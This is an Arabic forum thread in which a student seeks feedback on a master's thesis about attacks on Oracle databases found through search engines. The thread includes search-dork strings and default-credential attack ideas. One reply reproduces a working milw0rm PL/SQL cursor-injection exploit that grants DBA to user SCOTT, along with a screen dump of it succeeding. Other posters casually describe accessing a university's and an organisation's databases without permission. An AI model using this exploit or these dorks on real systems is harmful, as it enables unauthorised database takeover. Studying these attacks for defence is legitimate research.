الانتقال إلى المحتوى

رسالة ماجستير بعنوان Securing Oracle Database From Search Engines Attack


samia

Recommended Posts

السلام عليكم ورحمة الله وبركاته


ارجو من الاخوه الزملاء ابداء ارائهم بخصوص رساله بحث بالماجستير والتى هى بعنوان

Seuring oracle database from search engines attack



الموضوع باختصار بيتكلم عن مخاطر محركات البحث فى الوصول الى قواعد البيانات اوراكل وبالتالى مهاجمتها وهّذا يتم من خلال الدخول الى محركات البحث واجراء البحث عن كلمات دلالية للدخول الى الداتابيز انجن (isqlplus) فيقوم الهاكر بكتابة urltitle:/isqlplus او كتابة tnsnames او كلمات اخرى للدخول الى قواعد البانات وباستخدام default username/password يمكن الدخول على النظام وهذا لايتم فى جميع الانظمه ولكن يتم فقط فى الانظمه التى لم يتم عمل حماية على قوعد البيانات الخاصه بها وللاسف هذه النسبة لست بقليل حيث اجتازت حوالى 40% وهذه نسبة ليست بهينه الموضوع بصراحه عجبنى من خلال تصفحى بالانترنت والبحث عن مواضيع تخص الاوراكل سيكورتى فوجدت هذه المقاله والتى هى بعنوان" Search engine used to attack database" ودا الرابط الخاص بالملف ال بيشرحه


ويوجد اخرى للاختراق من خلال محركات البحث مثل
Default Passwords .
Easily-guessed Passwords .
Misconfigurations
Excessive Privileges
No Listener Password .
Denial of Services (DoS) & Buffer Overflows.
SQL injection
ونزلت مقالات كثيره بخصوص هذا الموضوع ارجو من الاخوه الزملاء ابداء ارائهم واقتراحاتهم بخصوص هذا الموضوع وهل لى ان ادعم هذه الرسالة بمشروع عملى ام لاارجو ان لا تبخلو على بأرائكم فهى تهمنى اشكركم

رابط هذا التعليق
شارك

This is slightly modified version of: http://milw0rm.com/exploits/7677
This is based on cursor injection and does not need create function privileges:

DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);
SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
end;

#-----------screen dump---------------------------------------------------#
SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT EXECUTE_CATALOG_ROLE NO YES NO
SCOTT RESOURCE NO YES NO

SQL> DECLARE
2 D NUMBER;
3 BEGIN
4 D := DBMS_SQL.OPEN_CURSOR;
5 DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute imme
diate ''grant dba to scott'';commit;end;',0);
6 SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
7 SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
8 end;
9
10
11 /
DECLARE
*
ERROR at line 1:
ORA-01403: no data found
ORA-06512: at "SYS.LT", line 6118
ORA-06512: at "SYS.LT", line 6087
ORA-06512: at line 7


SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT DBA NO YES NO
SCOTT EXECUTE_CATALOG_ROLE NO YES NO
SCOTT RESOURCE NO YES NO


Sid
www.notsosecure.com

# milw0rm.com [2009-07-02]

رابط هذا التعليق
شارك

سلام عليكم
انا لست خبير فى نظام الحماية ولكن وجد معلومة عن SQL injection هذه السطور مثال عليها فى المشاركة السابقة
- وكان من فترة وجد سطر sql على النت تضعة فى شريط البحث بجوجل يظهر لى تصميم القاعدة البيانات بعض المواقع عشوائى وسجلات الجداول وكلامات السر وكان ايامها دخلت على موقع كلية حاسبات جامعة عين شمس ولكن لاسف فقدت السطر ولكن الذى اتذكرة كان يعتمد على default username/password

رابط هذا التعليق
شارك

شكرا لك اخى zezo_isl على ردك وتفاعلك وبالفعل هذا ما اقوم بعمل الماستر فيه هو خطوره محركات البحث فى الدخول على قواعد البيانات فانا اتذكر ايضا زميل دخل على منظمه قويه باستخدام الديفلولت اكونت

ارجو تفاعل الناس بخصوص هذا الموضوع

رابط هذا التعليق
شارك

  • بعد 2 أسابيع...

انضم إلى المناقشة

يمكنك المشاركة الآن والتسجيل لاحقاً. إذا كان لديك حساب, سجل دخولك الآن لتقوم بالمشاركة من خلال حسابك.

زائر
أضف رد على هذا الموضوع...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   تمت استعادة المحتوى السابق الخاص بك.   مسح المحرر

×   You cannot paste images directly. Upload or insert images from URL.

جاري التحميل
×
×
  • أضف...

برجاء الإنتباه

بإستخدامك للموقع فأنت تتعهد بالموافقة على هذه البنود: سياسة الخصوصية